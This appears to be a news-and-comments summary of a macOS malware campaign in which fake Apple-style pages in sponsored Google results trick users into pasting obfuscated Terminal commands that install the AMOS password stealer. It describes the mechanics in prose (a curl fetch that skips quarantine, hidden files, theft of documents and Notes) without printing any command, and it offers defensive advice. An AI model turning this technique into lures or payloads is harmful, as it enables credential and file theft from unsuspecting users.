February 8, 2026
Paste-and-pray panic
More Mac malware from Google search
Google results strike again: fake Apple pages, stolen files, and an AI advice brawl
TLDR: Fake Apple-style pages in Google results are tricking Mac users into pasting commands that install a password-stealing tool. Comments split between locking down macOS permissions, blaming ads and search, and trusting AI to check commands—while skeptics note AI was part of the last scam, so caution wins.
Mac users say Google’s shiny sponsored results just led them straight into a malware trap: fake Apple-style pages and Medium posts that told people to copy-paste a mysterious Terminal command. That command pulls down the AMOS “stealer” — a sneaky program that instantly copies your documents, peeks at Notes, and even drops your password into a hidden file. The community gasped, joked, and raged: one commenter dubbed it paste-and-pray security while others cackled at the hacker’s folder name “FileGrabber.” The “chicken herpes” line from the original report? It became a meme within minutes.
The hottest fight: should we trust AI to vet commands? One user swears by asking a chatbot first, but others shot back that last year’s scam used ChatGPT as the lure, so AI as lifeguard might be the same shark in different sunglasses. Practical voices chimed in too: “turn off Full Disk Access for Terminal” drew nods, while “At least macOS has file permissions” felt like cold comfort when ads push poisoned links to the top. Another spicy debate erupted when a commenter said browsers should let web apps open your home folder — cue privacy alarms. And just when folks thought it was only search results, someone dropped a “GitHub too” warning with receipts. The crowd’s verdict: don’t trust promoted links, don’t paste commands you don’t understand, and don’t let panic click your password into a thief’s hands.
Key Points
- •New macOS malware campaign delivers AMOS (aka SOMA) stealers via forged Apple-like pages and poisoned Medium articles.
- •Malicious content is linked from Google properties (docs.google.com, business.google.com) and appears atop sponsored search results.
- •Users are instructed to paste base-64–obfuscated commands into Terminal; scripts use curl to fetch payloads without quarantine attributes.
- •Upon execution, AMOS exfiltrates Documents to a “FileGrabber” directory and creates hidden files (.agent, .mainHelper, .pass), also seeking access to Notes.
- •The article advises critically evaluating search results and sources, expanding shortened links, and never running opaque Terminal commands.